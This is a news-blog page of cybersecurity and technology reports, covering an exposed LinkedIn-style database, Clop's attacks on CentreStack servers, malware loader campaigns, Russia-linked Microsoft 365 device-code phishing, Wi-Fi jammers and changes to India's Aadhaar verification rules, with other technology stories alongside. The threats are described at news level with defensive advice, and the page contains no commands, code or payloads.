Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

profile
Data Breach Data Leak database Linkedin Personal Data profile

LinkedIn Profile Data Among Billions of Records Found in Exposed Online Database

 



Cybersecurity researchers recently identified a massive online database that was left publicly accessible without any security protections, exposing a vast collection of professional and personal information. The database contained more than 16 terabytes of data, representing over 4.3 billion individual records that could be accessed without authorization.

Researchers associated with Cybernews reported that the exposed dataset is among the largest lead-generation style databases ever discovered online. The information appears to be compiled from publicly available professional profiles, including data commonly found on LinkedIn, such as profile handles, URLs, and employment-related details.

The exposed records included extensive personal and professional information. This ranged from full names, job titles, employer names, and work histories to education records, degrees, certifications, skills, languages, and location data. In some cases, the datasets also contained phone numbers, email addresses, social media links, and profile images. Additional information related to corporate relationships and contract-linked data was also present, suggesting the dataset was built for commercial or business intelligence purposes.

Investigators believe the data was collected gradually over several years and across different geographic regions. The database was stored in a MongoDB instance, a system commonly used by organizations to manage large volumes of information efficiently. While MongoDB itself is widely used, leaving such databases unsecured can expose sensitive information at scale, which is what occurred in this incident.

The exposed database was discovered on November 23 and secured approximately two days later. However, researchers were unable to determine how long the data had been accessible before it was identified. The exposure is believed to have resulted from misconfiguration or human error rather than a deliberate cyberattack, a common issue in cloud-based data storage environments.

Researchers noted that the database was highly organized and structured, indicating the information was intentionally collected and maintained. Based on its format, the data also appears to be relatively current and accurate.

Such large datasets are particularly attractive to cybercriminals. When combined with automated tools or large language models, this information can be used to conduct large-scale phishing campaigns, generate fraudulent emails, or carry out targeted social engineering attacks against individuals and corporate employees.

Security experts recommend that individuals take precautionary measures following incidents like this. This includes updating passwords for professional networking accounts such as LinkedIn, email services, and any connected financial accounts. Users should also remain cautious of unexpected emails, messages, or phone calls that attempt to pressure them into sharing personal information or clicking unknown links.

Although collecting publicly available data is not illegal in many jurisdictions, failing to properly secure a database of this size may carry legal and regulatory consequences. At present, the ownership and purpose of the database remain unclear. Further updates are expected if more information becomes available or accountability is established.

Read more »
zero-day exploit
CentreStack vulnerability Clop Ransomware Data theft extortion file server attacks Gladinet CentreStack malware zero-day exploit

Clop Ransomware Targets Internet-Facing Gladinet CentreStack Servers in New Data Theft Campaign

 

The Clop ransomware group, also known as Cl0p, has launched a new extortion campaign aimed at Gladinet CentreStack file servers that are exposed to the internet.

Gladinet CentreStack is a file-sharing solution that allows organizations to securely access and share files stored on on-premises servers through web browsers, mobile applications, and mapped drives—without the need for a VPN. According to Gladinet, CentreStack “is used by thousands of businesses from over 49 countries.”

Since April, Gladinet has issued multiple security patches to fix several vulnerabilities that were actively exploited in attacks, including some zero-day flaws.

Threat actors linked to the Clop cybercrime operation are now actively scanning for CentreStack servers accessible online and breaching vulnerable systems. Curated Intelligence confirmed to BleepingComputer that attackers are leaving ransom notes on compromised servers.

At present, the exact vulnerability being used in these intrusions remains unknown. It is unclear whether Clop is exploiting a previously undisclosed zero-day flaw or taking advantage of an older vulnerability that has not yet been patched by affected organizations.

“Incident Responders from the Curated Intelligence community have encountered a new CLOP extortion campaign targeting Internet-facing CentreStack file servers,” warned threat intel group Curated Intelligence on Thursday.

“From recent port scan data, there appears to be at least 200+ unique IPs running the "CentreStack - Login" HTTP Title, making them potential targets of CLOP who is exploiting an unknown CVE (n-day or zero-day) in these systems.”

Clop has repeatedly targeted secure file transfer and file-sharing platforms as part of its extortion operations. The group has previously been responsible for high-profile breaches involving Accellion FTA, GoAnywhere MFT, Cleo, and MOVEit Transfer servers. The MOVEit campaign alone impacted more than 2,770 organizations globally.

More recently, Clop exploited an Oracle E-Business Suite zero-day vulnerability, tracked as CVE-2025-61882, to steal sensitive data from numerous organizations beginning in early August 2025.

Affected Oracle customers reportedly include Harvard University, The Washington Post, GlobalLogic, the University of Pennsylvania, Logitech, and Envoy Air, a subsidiary of American Airlines.

Following successful intrusions, the group exfiltrates confidential data and publishes it on its dark web leak site, often distributing the stolen files via Torrent downloads.

The U.S. Department of State has announced a reward of up to $10 million for information that could help attribute Clop’s cybercrime activities to a foreign government.

A spokesperson for Gladinet was not immediately available to comment when contacted by BleepingComputer earlier today.
Read more »
Microsoft Defender
Cyber Attacks Cyber Defender cybersecurity risks Malware Attack Malware Service Microsoft Defender

CountLoader and GachiLoader Malware Campaigns Target Cracked Software Users

 

Cybersecurity analysts have uncovered a new malware campaign that relies on cracked software download platforms to distribute an updated variant of a stealthy and modular loader known as CountLoader. According to researchers from the Cyderes Howler Cell Threat Intelligence team, the operation uses CountLoader as the entry point in a layered attack designed to establish access, evade defenses, and deploy additional malicious payloads. 

CountLoader has been observed in real-world attacks since at least June 2025 and was previously analyzed by Fortinet and Silent Push. Earlier investigations documented its role in delivering widely used malicious tools such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and cryptomining malware. The latest iteration demonstrates further refinement, with attackers leveraging familiar piracy tactics to lure victims. 

The infection process begins when users attempt to download unauthorized copies of legitimate software, including productivity applications. Victims are redirected to file-hosting platforms where they retrieve a compressed archive containing a password-protected file and a document that supplies the password. Once extracted, the archive reveals a renamed but legitimate Python interpreter configured to run malicious commands. This component uses the Windows utility mshta.exe to fetch the latest version of CountLoader from a remote server.  

To maintain long-term access, the malware establishes persistence through a scheduled task designed to resemble a legitimate Google system process. This task is set to execute every 30 minutes over an extended period and relies on mshta.exe to communicate with fallback domains. CountLoader also checks for the presence of endpoint protection software, specifically CrowdStrike Falcon, adjusting its execution method to reduce the risk of detection if security tools are identified. 

Once active, CountLoader profiles the infected system and retrieves follow-on payloads. The newest version introduces additional capabilities, including spreading through removable USB drives and executing malicious code entirely in memory using mshta.exe or PowerShell. These enhancements allow attackers to minimize their on-disk footprint while increasing lateral movement opportunities. In incidents examined by Cyderes, the final payload delivered was ACR Stealer, a data-harvesting malware designed to extract sensitive information from compromised machines. 

Researchers noted that the campaign reflects a broader shift toward fileless execution and the abuse of trusted, signed binaries. This approach complicates detection and underscores the need for layered defenses and proactive threat monitoring as malware loaders continue to evolve.  

Alongside this activity, Check Point researchers revealed details of another emerging loader named GachiLoader, a heavily obfuscated JavaScript-based malware written in Node.js. This threat is distributed through the so-called YouTube Ghost Network, which consists of hijacked YouTube accounts used to promote malicious downloads. The campaign has been linked to dozens of compromised accounts and hundreds of thousands of video views before takedowns occurred. 

In some cases, GachiLoader has been used to deploy second-stage malware through advanced techniques involving Portable Executable injection and Vectored Exception Handling. The loader performs multiple anti-analysis checks, attempts to gain elevated privileges, and disables key Microsoft Defender components to avoid detection. Security experts say the sophistication displayed in these campaigns highlights the growing technical expertise of threat actors and reinforces the importance of continuously adapting defensive strategies.
Read more »
Tether Adoption
Bitcoin City Crypto Payments Lugano Swiss Crypto Technology Tether Adoption

Lugano: Swiss Crypto Hub Where Bitcoin Pays for Everything

 

The Swiss city of Lugano, located in the Italian-speaking canton of Ticino, has turned itself into the European capital for cryptocurrency through its bold “Plan ₿” scheme, which lets citizens and businesses transact in Bitcoin and Tether for almost everything. The joint city of Lugano and Tether program is to build blockchain technology as the core of its financial infrastructure, the first major European city to scale to such a level with crypto payments. 

Widespread merchant adoption

More than 350 businesses in Lugano now accept Bitcoin, from shops to cafes, restaurants and yes, even luxury retailers. From coffee and burgers to designer bags, residents can buy it all with cryptocurrency — and still have the option to pay in Swiss francs. Entrepreneurs have adopted the system in large part because of cost – with transaction fees far lower for Bitcoin (less than 1 percent) than for credit cards (between 1.7 and 3.4 percent). 

Acceptance of cryptocurrency has now been expanded by the city council from retail exchanges to all city payments and services. Residents and business can now use a fully-automated system with the help of Bitcoin Suisse to pay taxes, attend preschool, or settle any other city-related bill in Bitcoin or Tether. Since the payment process is based on Swiss QR-Bill, users just scan the QR codes on the bills and pay them via mobile wallets. 

Technical infrastructure 

Bitcoin Suisse, the technical infrastructure provider, processes payments and manages integration with current municipal systems. The crypto payment option is alongside more traditional options such as bank transfer and payments at post office counters, so everyone’s needs are accommodated.

The Deputy Chief Financial Officer Paolo Bortolin said Lugano is “pioneers” at the municipality level in providing the unlimited acceptance of Bitcoin and Tether without requiring the manual generation of special crypto-friendly invoices. Plan B encompasses more than just payment infrastructure, including educational initiatives like the Plan ₿ Summer School in collaboration with local universities and an annual Plan B Forum conference held each October. 

The initiative positions Lugano as Europe's premier destination for Bitcoin, blockchain, and decentralized technology innovation, with the Plan B Foundation guiding strategic development and long-term vision. City officials, including Mayor Michele Foletti and Economic Promotion Director Pietro Poretti, remain committed to scaling blockchain adoption throughout all facets of daily life in Lugano.
Read more »
Russia Linked Hackers
Account Takeover Threats Cyber Attacks Device Code Phishing Entra ID Security Microsoft 365 Security Nation State Cyber Attacks OAuth Authentication Abuse Russia Linked Hackers

Microsoft 365 Users Targeted by Russia-Linked Device Code Phishing Operations


The global network infrastructure is experiencing a wave of sophisticated cyber intrusions as states-sponsored and financially motivated hackers are increasingly exploiting a legitimate Microsoft authentication mechanism to seize control of enterprise accounts in a broad range of sectors. 

There has been a recent investigation which uncovered attackers with ties to both Russian and Chinese interests have been exploiting Microsoft's OAuth 2.0 device authorization grant flow in an effort to deceive users into unknowingly granting them access to their Microsoft 365 environments through this feature designed to simplify secure logins. 

Through the use of fraudulently masquerading institutions and convincing targets to authenticate using authentic Microsoft services, attackers are able to obtain valid access tokens that enable persistent account compromises without requiring the compromise of the target's password. The Russian-linked threat actor Storm-2372 has been targeting government bodies and private organizations since August 2024 and has been one of the most active groups in this regard. 

In order to get the highest level of effectiveness from the device code phishing tactics, it has been proven to be more effective than conventional spear-phishing tactics. It has been conducted throughout Africa, Europe, the Middle East, and North America. Government, defence, healthcare, telecommunications, education, energy, and non-government organizations have been included in the campaign. 

It has been determined that the scale, targeting patterns, and operational discipline of the activity strongly point towards a coordinated nation-state effort aligned with Russian strategic objectives, as confirmed by Microsoft's Threat Intelligence Center. 

The campaign is now more clearly connected to an organization believed to be aligned with the Russian government. It has been a sustained phishing operation that leveraged Microsoft's device code authentication workflow to compromise Microsoft 365 accounts by using a sustained phishing operation. Under the designation UNK_AcademicFlare, Proofpoint has tracked this activity since September 2025 under the designation UNK_AcademicFlare. 

Investigators believe the attackers used email accounts that had previously been compromised from government and military organizations so that they could lend legitimacy to their outreach efforts. In both the United States and Europe, the messages were targeted at individuals and organizations within government agencies, policy think tanks, higher education institutions, and transportation-related organizations. 

There are deliberate steps involved in the approach. It begins with seemingly innocuous correspondence tailored to the recipient’s professional background, usually framed as preparations for an interview or collaboration. In order for victims to be informed, the sender will offer a document purported to outline discussion topics. The document will be hosted at a link that appears to be a Microsoft OneDrive account impersonating the sender.

There is a link within the email that actually redirects users to a Cloudflare Worker, which redirects the user to Microsoft's legitimate account lock page, during which the user enters the provided authentication code, which unwittingly authorizes access and generates a valid token that enables full account hijacking. 

Researchers in the field of cybersecurity note that this technique has gained traction, having been extensively documented earlier this year by Microsoft and Volexity and linked to clusters that are associated with Russia, such as Storm-2372 and APT29. 

Recent warnings from Amazon Threat Intelligence and Volexity have shown that it is still being used by Russian attackers. According to the latest technical details published by Microsoft and independent researchers, there have been several mechanisms behind the campaign that can shed light on the mechanisms that operate behind it. 

A Microsoft disclosure dated February 14, 2025 confirmed that Storm-2372 had begun authenticating through a specific Microsoft Authentication Broker client ID while using the device code sign-in method, which in turn allowed attackers to get refresh access tokens with the new Authentication Broker client ID. 

A device registration token can be exchanged into credentials linked to the device registration service after it has been acquired by an adversary, which makes it possible for that adversary to enroll attacker-controlled systems into Microsoft Entra ID and maintain persistent access for massive email harvesting operations. 

As a result of investigations, high-profile institutions such as the United States Department of State, the Ukrainian Ministry of Defense, the European Parliament, and prominent research organizations have been impersonated in the activities. Researchers have concluded that APT29, a group of malicious actors also known as Cozy Bear, Midnight Blizzard, Cloaked Ursa, and The Dukes, may be the cluster that is driving this activity. 

According to Volexity's case studies, operators are exploiting real-time communication channels as a means of accelerating victim compliance through real-time communication channels. In one incident, UTA0304 contacted a victim via Signal before moving the conversation to Element, and ultimately directed the target to a legitimate Microsoft page asking for an account code, pretending to be a secure chat service provider. 

A malicious attacker might use immediacy and context to convince the victims to act quickly, a tactic similar to those employed by marketing groups to promote Microsoft Teams meetings held by groups related to the phishing attack. 

A response from Microsoft has been to disable the device code flow whenever possible, restrict Entra ID access to trusted networks and devices via Conditional Access, and actively monitor sign-in logs for anomaly activity related to device code, including rapid authentication attempts and logins that originate from unknown locations, in order to prevent this from happening.

It is highly likely that organisations will have to implement layered technical controls in order to reduce exposure to this evolving threat in light of the fact that employee awareness alone cannot counter this evolving threat. In its recommendation to enterprises, Proofpoint recommends explicitly limiting the use of device code authentication. This can be described as the most effective way to prevent misuse of the OAuth device flow by enterprises. 

The adoption of such control systems begins with auditing or report-only deployments, which allows security teams to evaluate potential operational impacts by analyzing historical sign-in data before implementing them in their entirety. 

Providing a more granular, allow-list-based approach where a complete block is not feasible, researchers recommend that device code authentication be limited to narrowly defined and approved scenarios, for example, specific users, operating systems that are trusted, or network locations that are well known.

In addition to these safeguards, additional safeguards can also be implemented by requiring Microsoft 365 sign-ins to originate from compliant or registered devices, particularly in environments that use device registration or Microsoft Intune as authentication methods. Proofpoint warns, however, that misuse of OAuth authentication mechanisms is likely to increase as organizations begin adopting FIDO-compliant multifactor authentication, thus highlighting the need to implement proactive policies and continuous monitoring of these systems. 

Furthermore, researchers have also discovered a broader ecosystem of infrastructure and social engineering techniques that are being used to maintain and expand the campaign, which is ongoing. During the analysis of the phishing URLs, researchers noted that some of them were temporarily inactive. However, the accompanying emails instructed recipients to copy and share the full URL of the browser in case of an error, which is consistent with the tactics used for OAuth device code phishing to extract usable authentication data.

Among the domains involved, ustrs[.]com, seems to have been purchased as a result of a domain auction or resale service. Though the domain was originally registered in early 2020, WHOIS records indicate that it was updated in late 2025, a strategy that has long been used as a way of evading reputation-based security controls that rely heavily on domain age as a signal of trustworthiness.

It was Volexity that observed the same sender approach additional organizations in November 2025, promoting a conference registration link on brussels-indo-pacific-forum[.]org, which has been created to mimic the Brussels Indo-Pacific Dialogue, in an attempt to fool the target audience.

As soon as the victims attempted to sign up for the site, they were presented with a Microsoft 365 authentication process disguised as a legitimate signup process, which then sent them to a benign confirmation page. According to research conducted in connection with Belgrade Security Conference earlier campaigns, subsequent access to compromised accounts was routed through proxy network infrastructures to conceal the attackers' origin, as seen in earlier campaigns. 

Further research has demonstrated that by exploiting standard professional courtesies, operators were systematically extending their reach. When targets declined event invitations, multiple times, as tracked as activity associated with UTA0355, they were urged to register for updates, to share contact details with colleagues who might be interested, and to share contact information with other colleagues who may have been interested as well. 

At least one example involved an unwitting intermediary introducing a new target to the threat actor through an unwitting intermediary, which enabled the attackers to gather new leads organically. In addition, domain registration data related to impersonated events revealed other infrastructure that may have been associated with the same cluster, according to WHOIS data for bsc2025[.]org, a domain resembling Belgrade Security Conference, which was registered using the address mailum[.]com, a relatively unknown e-mail service. 

The Volexity investigation was expanded to identify other domains masquerading as the World Nuclear Exhibition scheduled for November 2025, including world-nuclear-exhibition-paris[.]com, wne-2025[.]com, and confirmyourflight-parisaeroport[.]com, that gave the impression that the World Nuclear Exhibition was being held in Paris. In spite of the fact that researchers do not believe their domains were specifically utilized in confirmed attacks, they can assess that they might have assisted the campaign in its early stages. 

Overall, these findings illustrate a shift in how advanced threat actors are increasingly relying on trusted identity frameworks in place of traditional malware and credential theft in order to carry out their attacks. It has been demonstrated that these campaigns reduce the likelihood of detection, increase user compliance, and decrease the likelihood of detection by weaponizing legitimate authentication flows and embedding them within credible professional interactions.

Organisations may have to deal with longer-term risks associated with persistent access in addition to immediate account compromise, data exposure, internal reconnaissance, and follow-up attacks resulting from persistent access. As a result, security teams are urged to revisit assumptions regarding "trusted" login mechanisms, to improve identity governance, and to ensure visibility into events that do not involve interactive interaction and that are based on a device. 

An attack surface can be significantly reduced by taking proactive measures such as tightening OAuth permissions, auditing registered devices and applications, and stress testing Conditional Access policies. Moreover, leadership and security stakeholders need to be aware that modern phishing campaigns are increasingly modeled on legitimate business workflows, and that defense strategies must be complemented by context-aware user education in order to protect themselves. 

A number of low-friction, high-impact attack techniques are being refined by attackers to gain a higher degree of sophistication, which makes it more challenging for organisations that treat this aspect of their operations as a core operational priority to stop intrusions before they become systemic breaches.
Read more »
Technology
Adobe Photoshop AI ChatGPT OpenAI PDF Files Technology

Adobe Brings Photo, Design, and PDF Editing Tools Directly Into ChatGPT

 



Adobe has expanded how users can edit images, create designs, and manage documents by integrating select features of its creative software directly into ChatGPT. This update allows users to make visual and document changes simply by describing what they want, without switching between different applications.

With the new integration, tools from Adobe Photoshop, Adobe Acrobat, and Adobe Express are now available inside the ChatGPT interface. Users can upload images or documents and activate an Adobe app by mentioning it in their request. Once enabled, the tool continues to work throughout the conversation, allowing multiple edits without repeatedly selecting the app.

For image editing, the Photoshop integration supports focused and practical adjustments rather than full professional workflows. Users can modify specific areas of an image, apply visual effects, or change settings such as brightness, contrast, and exposure. In some cases, ChatGPT presents multiple edited versions for users to choose from. In others, it provides interactive controls, such as sliders, to fine-tune the result manually.

The Acrobat integration is designed to simplify common document tasks. Users can edit existing PDF files, reduce file size, merge several documents into one, convert files into PDF format, and extract content such as text or tables. These functions are handled directly within ChatGPT once a file is uploaded and instructions are given.

Adobe Express focuses on design creation and quick visual content. Through ChatGPT, users can generate and edit materials like posters, invitations, and social media graphics. Every element of a design, including text, images, colors, and animations, can be adjusted through conversational prompts. If users later require more detailed control, their projects can be opened in Adobe’s standalone applications to continue editing.

The integrations are available worldwide on desktop, web, and iOS platforms. On Android, Adobe Express is already supported, while Photoshop and Acrobat compatibility is expected to be added in the future. These tools are free to use within ChatGPT, although advanced features in Adobe’s native software may still require paid plans.

This launch follows OpenAI’s broader effort to introduce third-party app integrations within ChatGPT. While some earlier app promotions raised concerns about advertising-like behavior, Adobe’s tools are positioned as functional extensions rather than marketing prompts.

By embedding creative and document tools into a conversational interface, Adobe aims to make design and editing more accessible to users who may lack technical expertise. The move also reflects growing competition in the AI space, where companies are racing to combine artificial intelligence with practical, real-world tools.

Overall, the integration represents a shift toward more interactive and simplified creative workflows, allowing users to complete everyday editing tasks efficiently while keeping professional software available for advanced needs.




Read more »
wireless cameras
burglary prevention home security systems smart home security Technology Wi-Fi interference Wi-Fi jammer wired security wireless cameras

Wi-Fi Jammers Pose a Growing Threat to Home Security Systems: What Homeowners Can Do

  •  

Wi-Fi technology powers most modern home security systems, from surveillance cameras to smart alarms. While this connectivity offers convenience, it also opens the door to new risks. One such threat is the growing use of Wi-Fi jammers—compact devices that can block wireless signals and potentially disable security systems just before a break-in. By updating your security setup, you can reduce this risk and better protect your home.

Key concern homeowners should know:

  • Wi-Fi jammers can interrupt wireless security cameras and smart devices.
  • Even brief signal disruption may prevent useful footage from being recorded.

Wi-Fi jammers operate by overpowering a network with a stronger signal on the same frequency used by home security systems. Though the technology itself isn’t new, law enforcement believes it is increasingly being exploited by burglars trying to avoid identification. A report by KPRC Click2Houston described a case where a homeowner noticed their camera feed becoming distorted as thieves approached, allegedly using a backpack containing a Wi-Fi jammer. Similar incidents were later reported by NBC Los Angeles in high-end neighborhoods in California.

How criminals may use jammers:

  • Target wireless-only security setups.
  • Disable cameras before entering a property.
  • Avoid being captured on surveillance footage.

Despite these risks, Wi-Fi jammers are illegal in the Unite States under the Communications Act of 1934. Federal agencies including the Department of Justice, Homeland Security, and the Federal Communications Commission actively investigate and prosecute those who sell or use them. Some states, such as Indiana and Oregon, have strengthened laws to improve enforcement. Still, the devices remain accessible, making awareness and prevention essential.

Legal status at a glance:

  • Wi-Fi jammers are banned nationwide.
  • Selling or operating them can lead to serious penalties.
  • Enforcement varies by state, but possession is still illegal.

While it’s unclear how often burglars rely on this method, smart home devices remain vulnerable to signal interference. According to CNET, encryption protects data but does not stop jamming. They also note that casual use by criminals is uncommon due to the technical knowledge required. However, real-world cases in California and Texas highlight why extra safeguards matter.

Ways to protect your home:

  • Choose wired security systems that don’t rely on Wi-Fi.
  • Upgrade to dual-band routers using both 2.4 GHz and 5 GHz.
  • Opt for security systems with advanced encryption.
  • Regularly review and update your home security setup.

Taking proactive steps to safeguard your security cameras and smart devices can make a meaningful difference. Even a short disruption in surveillance may determine whether authorities can identify a suspect, making prevention just as important as detection.

Read more »
Microsoft
AI recruitment India AI technology Amazon Artifcial Intelligence Cyber Security Data Center Indian Market Microsoft

Amazon and Microsoft AI Investments Put India at a Crossroads

 

Major technology companies Amazon and Microsoft have announced combined investments exceeding $50 billion in India, placing artificial intelligence firmly at the center of global attention on the country’s technology ambitions. Microsoft chief executive Satya Nadella revealed the company’s largest-ever investment in Asia, committing $17.5 billion to support infrastructure development, workforce skills, and what he described as India’s transition toward an AI-first economy. Shortly after, Amazon said it plans to invest more than $35 billion in India by 2030, with part of that funding expected to strengthen its artificial intelligence capabilities in the country. 

These announcements arrive at a time of heightened debate around artificial intelligence valuations globally. As concerns about a potential AI-driven market bubble have grown, some financial institutions have taken a contrarian view on India’s position. Analysts at Jefferies described Indian equities as a “reverse AI trade,” suggesting the market could outperform if global enthusiasm for AI weakens. HSBC has echoed similar views, arguing that Indian stocks offer diversification for investors wary of overheated technology markets elsewhere. This perspective has gained traction as Indian equities have underperformed regional peers over the past year, while foreign capital has flowed heavily into AI-centric companies in South Korea and Taiwan. 

Against this backdrop, the scale of Amazon and Microsoft’s commitments offers a significant boost to confidence. However, questions remain about how competitive India truly is in the global AI race. Adoption of artificial intelligence across the country has accelerated, with increasing investment in data centers and early movement toward domestic chip manufacturing. A recent collaboration between Intel and Tata Electronics to produce semiconductors locally reflects growing momentum in strengthening AI infrastructure. 

Despite these advances, India continues to lag behind global leaders when it comes to building sovereign AI models. The government launched a national AI mission aimed at supporting researchers and startups with high-performance computing resources to develop a large multilingual model. While officials say a sovereign model supporting more than 22 languages is close to launch, global competitors such as OpenAI and China-based firms have continued to release more advanced systems in the interim. India’s public investment in this effort remains modest when compared with the far larger AI spending programs seen in countries like France and Saudi Arabia. 

Structural challenges also persist. Limited access to advanced semiconductors, fragmented data ecosystems, and insufficient long-term research investment constrain progress. Although India has a higher-than-average concentration of AI-skilled professionals, retaining top talent remains difficult as global mobility draws developers overseas. Experts argue that policy incentives will be critical if India hopes to convert its talent advantage into sustained leadership. 

Even so, international studies suggest India performs strongly relative to its economic stage. The country ranks among the top five globally for new AI startups receiving investment and contributes a significant share of global AI research publications. While funding volumes remain far below those of the United States and China, experts believe India’s advantage may lie in applying AI to real-world problems rather than competing directly in foundational model development. 

AI-driven applications addressing agriculture, education, and healthcare are already gaining traction, demonstrating the technology’s potential impact at scale. At the same time, analysts warn that artificial intelligence could disrupt India’s IT services sector, a long-standing engine of economic growth. Slowing hiring, wage pressure, and weaker stock performance indicate that this transition is already underway, underscoring both the opportunity and the risk embedded in India’s AI future.
Read more »
UK Schools
AI Classrooms Deepfake Teachers Remote Teaching Secondary SEO Tags Technology UK Schools

AI Avatars Trialled to Ease UK Teacher Crisis

 

In the UK, where teacher recruitment and retention is becoming increasingly dire, schools have started experimenting with new and controversial technology – including AI-generated “deepfake” avatars and remote teaching staff. Local media outlets are tracking these as answers to the mass understaffing and overwork in the education sector and delving into the ethics and practicalities. 

Emergence of the deepfake teacher

One of the most radical experiments underway is the use of AI to construct realistic digital avatars of real-life teachers. At the Great Schools Trust, for example, staff are trialling technology that creates video clones of themselves to teach . These "deepfake" teachers are mainly intended to help students state up on the curriculum if they have missed class for whatever reason. By deploying these avatars, schools hope they can provide students with reliable, high-quality instruction without further taxing the physical teacher’s time. 

Advocates including Mr. Ierston maintain the technology is not replacing human teachers but freeing them from monotonous work. The vision is that AI can take over the administrative tasks and the routine delivery, with human teachers concentrating on delivering personalised support and managing the classroom. In addition to catch-up lessons, the technology also has translation features, so schools can speak to parents in dozens of different languages, instantly. 

Alongside AI avatars, schools are turning increasingly to remote teaching models to fill holes in core subjects such as math. The report draws attention to a Lancashire secondary school which has appointed a maths teacher who is now living thousands of miles away. This now-remote staffer teaches a class of students from a classroom via live video link, a strategy forced by necessity in communities where finding qualified teachers is a pipe dream. 

Human cost of high-tech solutions 

Despite the potential efficiency gains, the shift has sparked significant scepticism from unions and educators. Critics argue that teaching is fundamentally an interpersonal profession that relies on human connection, empathy, and the ability to read a room—qualities that a screen or an avatar cannot replicate. 

There are widespread concerns that such measures could de-professionalize the sector and serve as a "sticking plaster" rather than addressing the root causes of the recruitment crisis, such as pay and working conditions. While the government and tech advocates view these tools as a way to "level the playing field" and reduce workload, many in the profession remain wary of a future where the teacher at the front of the room might not be there at all.
Read more »
UIDAI Regulations
Aadhaar Verification Biometric Data Protection Compliance Cybersecurity Governance Digital Identity Security DPDP Act India Facial Authentication Offline Identity Verification Privacy UIDAI Regulations

Aadhaar Verification Rules Amended as India Strengthens Data Compliance


 

It is expected that India's flagship digital identity infrastructure, the Aadhaar, will undergo significant changes to its regulatory framework in the coming days following a formal amendment to the Aadhaar (Targeted Determination of Services and Benefits Management) Regulations, 2.0.

Introducing a new revision in the framework makes facial authentication formally recognized as a legally acceptable method of verifying a person's identity, marking a significant departure from traditional biometric methods such as fingerprinting and iris scans. 

The updated regulations introduce a strong compliance framework that focuses on explicit user consent, data minimisation, and privacy protection, as well as a stronger compliance architecture. The government seems to have made a deliberate effort to align Aadhaar's operational model with evolving expectations about biometric governance, data protection, and the safe and responsible use of digital identity systems as they evolved. 

In the course of undergoing the regulatory overhaul, the Unique Identification Authority of India has introduced a new digital identity tool called the Aadhaar Verifiable Credential in order to facilitate a secure and tamper-proof identity verification process. 

Additionally, the authority has tightened the compliance framework governing offline Aadhaar verification, placing higher accountability on entities that authenticate identities without direct access to the UIDAI system in real time. Aadhaar (Authentication and Offline Verification) Regulations, 2021 have been amended to include these measures, and they were formally published by the UIDAI on December 9 through the Gazette as well as on UIDAI's website. 

UIDAI has also launched a dedicated mobile application that provides individuals with a higher degree of control over how their Aadhaar data is shared, which emphasizes the shift towards a user-centric identity ecosystem which is also concerned with privacy. 

According to the newly released Aadhaar rules, the use of facial recognition as a valid means of authentication would be officially authorised as of the new Aadhaar rules, while simultaneously tightening consent requirements, purpose-limitations, and data-use requirements to ensure compliance with the Digital Personal Data Protection Act. 

In addition, the revisions indicate a substantial shift in the scope of Aadhaar's deployment in terms of how it is useful, extending its application to an increased range of private-sector uses under stricter regulation, so as to extend its usefulness beyond welfare delivery and government services. This change coincides with a preparation on the part of the Unique Identification Authority of India to launch a newly designed mobile application for Aadhaar. 

As far as officials are concerned, the application will be capable of supporting Aadhaar-based identification for routine scenarios like event access, registrations at hotels, deliveries, and physical access control, without having to continuously authenticate against a central database in real-time. 

Along with the provisions in the updated framework that explicitly acknowledge facial authentication and the existing biometric and one-time password mechanisms, the updated framework is also strengthening provisions governing offline Aadhaar verification, so that identity verification can be carried out in a controlled manner without direct connection to UIDAI's systems. 

As part of the revised framework, offline Aadhaar verification is also broadened beyond the limited QR code scanning that was previously used. A number of verification methods have been authorised by UIDAI as a result of this notification, including QR code-based checks, paperless offline e-KYC, Aadhaar Verifiable Credential validation, electronic authentication through Aadhaar, and paper-based offline verification. 

Additional mechanisms can be approved as time goes by, with the introduction of the Aadhaar Verifiable Credential, a digitally signed document with cryptographically secure features that contains some demographic data. This is the most significant aspect of this expansion. With the ability to verify locally without constantly consulting UIDAI's central databases, this credential aims to reduce systemic dependency on live authentication while addressing long-standing privacy and data security concerns that have arose. 

Additionally, the regulations introduce offline face verification, a system which allows a locally captured picture of the holder of an Aadhaar to be compared to the photo embedded in the credential without having to transmit biometric information over an external network. Furthermore, the amendments establish a formal regulatory framework for entities that conduct these checks, which are called Offline Verification Seeking Entities.

 The UIDAI has now mandated that organizations seeking to conduct offline Aadhaar verification must register, submit detailed operational and technical disclosures, and adhere to prescribed procedural safeguards in order to conduct the verification. A number of powers have been granted to the authority, including the ability to review applications, conduct inspections, obtain clarifications, suspend or revoke access in the case of noncompliance. 

In addition to clearly outlining grounds for action, the Enforcement provisions also include the use of verification facilities, deviation from UIDAI standards, failure to cooperate with audits, and facilitation of identity-related abuse. A particularly notable aspect of these rules is that they require affected entities to be provided an opportunity to present their case prior to punitive measures being imposed, reinforcing the idea of respecting due process and fairness in regulations. 

In the private sector, the verification process using Aadhaar is still largely unstructured at present; hotels, housing societies, and other service providers routinely collect photocopies or images of identity documents, which are then shared informally among vendors, security personnel, and front desk employees with little clarity regarding how they will retain or delete those documents. 

By introducing a new registration framework, we hope to replace this fragmented system with a regulated one, in which private organizations will be formally onboarded as Offline Verification Seeking Entities, and they will be required to use UIDAI-approved verification flows in place of storing Aadhaar copies, either physically or digitally.

With regard to this transition, one of the key elements of UIDAI's upcoming mobile application will be its ability to enable selective disclosure by allowing residents to choose what information is shared for a particular reason. For example, a hotel may just receive the name and age bracket of the guest, a telecommunication provider the address of the guest, or a delivery service the name and photograph of the visitor, rather than a full identity record. 

Aadhaar details will also be stored in the application for family members, biometric locks and unlocks can be performed instantly, and demographic information can be updated directly, thus reducing reliance on paper-based processes. As a result, control is increasingly shifting towards individuals, minimizing the risk of exposure that service providers face to their data and curbing the indefinite circulation of identity documents. 

UIDAI has been working on a broader ecosystem-building initiative that includes regulatory pushes, which are part of a larger effort. In November, the organization held a webinar, in which over 250 organizations participated, including hospitality chains, logistics companies, real estate managers, and event planners, in order to prepare for the rollout. 

In the midst of ongoing vulnerability concerns surrounding the Aadhaar ecosystem, there has been an outreach to address them. Based on data from the Indian Cyber Crime Coordination Centre, Aadhaar Enabled Payment System transactions are estimated to account for approximately 11 percent of the cyber-enabled financial fraud of 2023, according to the Centre's data. 

Several states have reported instances where cloned fingerprints associated with Aadhaar have been used to siphon beneficiary funds, most often after public records or inadequately secure computer systems have leaked data. Aadhaar-based authentication has been viewed as a systemic risk by some privacy experts, saying it could increase systemic risks if safeguards are not developed in parallel with its extension into private access environments. 

